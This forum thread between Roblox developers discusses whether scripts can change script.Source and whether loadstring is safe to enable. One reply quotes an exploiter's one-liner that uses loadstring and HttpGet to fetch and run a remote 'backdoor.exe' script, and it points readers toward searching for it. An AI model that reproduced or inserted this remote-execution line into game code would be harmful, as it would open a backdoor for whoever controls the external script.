Script.Source in ROBLOX

ItsLightRBLX · August 7, 2022, 9:36am

Hello Developers,
Is there anyway to use script.source in a localscript / script without the use of a plugin or command line. If so / or there are other ways to approach this let me know by replying.

lilmazen1234 · August 7, 2022, 9:44am

Only plugin commands do that Sadly.

ItsLightRBLX · August 7, 2022, 9:45am

Is there a way to create an instance and change the source?

lilmazen1234 · August 7, 2022, 9:46am

Sadly, you can’t if you try to do that it will error this

The current identity (2) cannot Source (lacking permission 1)

ItsLightRBLX · August 7, 2022, 9:47am

Hm, would it be possibly to have code as a string run, say when you use a function?

lilmazen1234 · August 7, 2022, 9:49am

As I’ve said you can’t do that the script doesn’t have enough permission only plugins do because they have full access to most things.

Also, what do you mean by this? could you be more clear

ItsLightRBLX · August 7, 2022, 9:50am

I could use loadstring, although that does risk a few possibility’s of bad things.

BenMactavsin · August 7, 2022, 9:52am

You can use loadstring in scripts by setting LoadStringEnabled to true in ServerScriptService properties, this doesn’t work for localscripts though and it disables some Luau specific optimizations.

It only becomes risky when you don’t filter what’s running inside it. For example, a valid Luau code passed by a player.

ItsLightRBLX · August 7, 2022, 9:53am

How would I protect the game from a user exploiting loadstring?

BenMactavsin · August 7, 2022, 9:54am

Depends, why do you need user to run Luau code with loadstring in the first place?

ItsLightRBLX · August 7, 2022, 10:00am

Ironically it is to protect scripts.

BenMactavsin · August 7, 2022, 10:13am

I don’t follow. How loadstring is supposed to protect scripts?

AceBookMarker · August 7, 2022, 10:26am

That was used by exploiter.

Especially embedding backdoor activation from foreign site.

Expertcoderz · August 7, 2022, 10:32am

Besides using loadstring, you could use a Lua(u) VM / “custom loadstring” module which would work on both the client and server.

Expertcoderz · August 7, 2022, 10:33am

Could you elaborate on how exactly that happened? What does “embedding backdoor” mean?

AceBookMarker · August 7, 2022, 10:39am

Especially this line.

loadstring(game:HttpGet("https://raw.******usercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))();

Search backdoor.exe if you are okay to go to dark side.

Disclaimer for stuff: URL reported to @Exploit_Reports

Expertcoderz · August 7, 2022, 3:30pm

There isn’t much Roblox can do about it since it’s an external site; you’d be better off reporting the repository to GitHub.

ItsLightRBLX · August 8, 2022, 9:40am

Sorry for the late reply but this seems interesting can you show examples of this? I am thinking of using rerumi for the custom loadstring, although a few examples would be nice!